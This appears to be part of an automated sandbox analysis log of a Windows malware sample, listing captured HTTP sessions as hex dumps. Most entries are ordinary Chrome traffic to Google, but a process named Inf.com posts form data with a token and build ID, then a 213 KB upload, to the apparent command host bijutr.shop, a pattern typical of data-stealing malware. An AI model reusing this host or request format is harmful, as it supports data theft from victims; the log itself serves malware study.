                                                                                                                                                                                                                                                                            Data Ascii: 55IzUGdEa0FPaElZdGxTd0JMaGxhYnVFVnMrbFJJQXRKVkozb1FPcEFXQk81RkdPUVVzcmdPNENnRElTTGFUanl
                                                                                                                                                                                                                                                                            2024-12-27 06:10:54 UTC1229INData Raw: 34 63 36 0d 0a 58 59 54 4e 43 53 47 4e 6f 55 6a 42 7a 57 57 70 31 61 55 64 54 53 55 31 6c 61 31 56 51 5a 30 52 7a 51 6a 4a 4d 56 54 4a 42 53 55 46 6c 62 30 70 56 63 57 6c 35 5a 6d 6c 31 4c 79 73 77 57 6b 39 6e 56 6e 70 4f 51 55 55 79 54 7a 42 53 52 57 6c 7a 65 47 67 7a 65 55 56 6f 63 55 78 61 59 56 4d 30 53 6d 64 4d 51 6d 39 47 65 6b 56 58 4e 33 56 43 55 6c 5a 33 57 6b 35 43 5a 7a 6b 34 64 55 4a 73 61 55 70 55 53 45 52 6e 64 6d 5a 74 52 54 42 52 53 47 70 56 56 33 5a 35 4e 33 42 4b 62 45 4e 4a 4f 46 56 72 51 55 52 45 56 56 64 45 52 31 4e 33 56 6c 68 49 51 31 68 70 55 6a 42 68 55 56 4e 34 61 57 4e 43 5a 58 64 53 51 6c 46 31 61 55 35 59 54 46 68 5a 57 58 42 68 4e 33 64 74 56 56 64 48 4f 55 56 58 57 48 52 57 55 44 5a 6c 55 7a 6c 4a 53 57 52 32 57 48 6c 47 55
                                                                                                                                                                                                                                                                            Data Ascii: 4c6XYTNCSGNoUjBzWWp1aUdTSU1la1VQZ0RzQjJMVTJBSUFlb0pVcWl5Zml1LyswWk9nVnpOQUUyTzBSRWlzeGgzeUVocUxaYVM0SmdMQm9GekVXN3VCUlZ3Wk5CZzk4dUJsaUpUSERndmZtRTBRSGpVV3Z5N3BKbENJOFVrQUREVVdER1N3VlhIQ1hpUjBhUVN4aWNCZXdSQlF1aU5YTFhZWXBhN3dtVVdHOUVXWHRWUDZlUzlJSWR2WHlGU
                                                                                                                                                                                                                                                                            2024-12-27 06:10:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            32192.168.2.649968142.250.181.684437472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:10:53 UTC498OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-27 06:10:54 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Version: 705503573
                                                                                                                                                                                                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:10:54 GMT
                                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            2024-12-27 06:10:54 UTC372INData Raw: 31 36 65 33 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                                            Data Ascii: 16e3)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                                            2024-12-27 06:10:54 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                                            Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                                            2024-12-27 06:10:54 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                            Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                                            2024-12-27 06:10:54 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                                            Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                                            2024-12-27 06:10:54 UTC1325INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                                            Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                                            2024-12-27 06:10:54 UTC308INData Raw: 31 32 64 0d 0a 2d 6c 61 62 65 6c 31 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 30 34 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70
                                                                                                                                                                                                                                                                            Data Ascii: 12d-label1","left_product_control-label2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700304,3701384,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_scrip
                                                                                                                                                                                                                                                                            2024-12-27 06:10:54 UTC1390INData Raw: 38 30 30 30 0d 0a 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 78 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 61 2e 6a 29 69 66 28 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 29 66 6f 72 28 76 61 72 20 64 20 6f 66 20 63 29 5f 2e 78 64 28 61 2c 62 2c 64 29 3b 65 6c 73 65 7b 64 5c 75 30 30 33 64 28 30 2c 5f 2e 7a 29 28 61 2e 43 2c 61 2c 62 29 3b 63 6f 6e 73 74 20 65 5c 75 30 30 33 64 61 2e 76 2b 63 3b 61 2e 76 2b 2b 3b 62 2e 64 61 74 61 73 65 74 2e 65 71 69 64 5c 75 30 30 33 64 65 3b 61 2e 42 5b 65 5d 5c 75 30 30 33 64 64 3b 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 62 2e 61 64
                                                                                                                                                                                                                                                                            Data Ascii: 8000unction(_){var window\u003dthis;\ntry{\n_.xd\u003dfunction(a,b,c){if(!a.j)if(c instanceof Array)for(var d of c)_.xd(a,b,d);else{d\u003d(0,_.z)(a.C,a,b);const e\u003da.v+c;a.v++;b.dataset.eqid\u003de;a.B[e]\u003dd;b\u0026\u0026b.addEventListener?b.ad
                                                                                                                                                                                                                                                                            2024-12-27 06:10:54 UTC1390INData Raw: 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 49 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 46 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 6e 68 5c 75 30 30 33 64 61 7d 7d 3b 5f 2e 4b 64 5c 75 30 30 33 64 5b 47 64 28 5c 22 64 61 74 61 5c 22 29 2c 47 64 28 5c 22 68 74 74 70 5c 22 29 2c 47 64 28 5c 22 68 74 74 70 73 5c 22 29 2c 47 64 28 5c 22 6d 61 69 6c 74 6f 5c 22 29 2c 47 64 28 5c 22 66 74 70 5c 22 29 2c 6e 65 77 20 5f 2e 46 64 28 61 5c 75 30 30 33 64 5c
                                                                                                                                                                                                                                                                            Data Ascii: 3dclass{constructor(a){this.i\u003da}toString(){return this.i}};_.Jd\u003dnew _.Id(\"about:invalid#zClosurez\");_.Fd\u003dclass{constructor(a){this.nh\u003da}};_.Kd\u003d[Gd(\"data\"),Gd(\"http\"),Gd(\"https\"),Gd(\"mailto\"),Gd(\"ftp\"),new _.Fd(a\u003d\
                                                                                                                                                                                                                                                                            2024-12-27 06:10:54 UTC1390INData Raw: 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 63 2c 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c 22 3a 62 2e 6e 6f 6e 63 65 7c 7c 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5c 22 6e 6f 6e 63 65 5c 22 29 7c 7c 5c 22 5c 22 7d 3b 5c 6e 5f 2e 24 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 5c 75 30 30 33 64 5f 2e 4d 61 28 61 29 3b 72 65 74 75 72 6e 20 62 5c 75 30
                                                                                                                                                                                                                                                                            Data Ascii: ent){let c,d;b\u003d(d\u003d(c\u003d\"document\"in b?b.document:b).querySelector)\u003d\u003dnull?void 0:d.call(c,`${a}[nonce]`);return b\u003d\u003dnull?\"\":b.nonce||b.getAttribute(\"nonce\")||\"\"};\n_.$d\u003dfunction(a){var b\u003d_.Ma(a);return b\u0
                                                                                                                                                                                                                                                                            2024-12-27 06:10:54 UTC1390INData Raw: 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 6f 72 5c 22 3f 61 2e 68 74 6d 6c 46 6f 72 5c 75 30 30 33 64 63 3a 6a 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 64 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 6a 65 5b 64 5d 2c 63 29 3a 5f 2e 65 65 28 64 2c 5c 22 61 72 69 61 2d 5c 22 29 7c 7c 5f 2e 65 65 28 64 2c 5c 22 64 61 74 61 2d 5c 22 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 64 2c 63 29 3a 61 5b 64 5d 5c 75 30 30 33 64 63 7d 29 7d 3b 6a 65 5c 75 30 30 33 64 7b 63 65 6c 6c 70 61 64 64 69 6e 67 3a 5c 22 63 65 6c 6c 50 61 64 64 69 6e 67 5c 22 2c 63 65 6c 6c 73 70 61 63 69
                                                                                                                                                                                                                                                                            Data Ascii: Text\u003dc:d\u003d\u003d\"class\"?a.className\u003dc:d\u003d\u003d\"for\"?a.htmlFor\u003dc:je.hasOwnProperty(d)?a.setAttribute(je[d],c):_.ee(d,\"aria-\")||_.ee(d,\"data-\")?a.setAttribute(d,c):a[d]\u003dc})};je\u003d{cellpadding:\"cellPadding\",cellspaci


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            33192.168.2.649969142.250.181.684437472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:10:53 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-27 06:10:54 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Version: 705503573
                                                                                                                                                                                                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:10:54 GMT
                                                                                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            2024-12-27 06:10:54 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                            2024-12-27 06:10:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            34192.168.2.649988188.245.216.2054436636C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:10:57 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----C2DT0R1DBSJE379HDB1N
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                            Host: bijutr.shop
                                                                                                                                                                                                                                                                            Content-Length: 505
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            2024-12-27 06:10:57 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 43 32 44 54 30 52 31 44 42 53 4a 45 33 37 39 48 44 42 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 32 32 33 62 65 37 37 32 64 33 33 36 33 65 38 33 38 37 64 64 36 38 35 37 37 65 64 61 61 34 30 0d 0a 2d 2d 2d 2d 2d 2d 43 32 44 54 30 52 31 44 42 53 4a 45 33 37 39 48 44 42 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 43 32 44 54 30 52 31 44 42 53 4a 45 33 37 39 48 44 42 31 4e 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                            Data Ascii: ------C2DT0R1DBSJE379HDB1NContent-Disposition: form-data; name="token"1223be772d3363e8387dd68577edaa40------C2DT0R1DBSJE379HDB1NContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------C2DT0R1DBSJE379HDB1NCont
                                                                                                                                                                                                                                                                            2024-12-27 06:10:58 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:10:58 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-27 06:10:58 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            35192.168.2.649990188.245.216.2054436636C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:10:58 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----SR1DJ58GDTRIM7GDJ5XL
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                            Host: bijutr.shop
                                                                                                                                                                                                                                                                            Content-Length: 213453
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
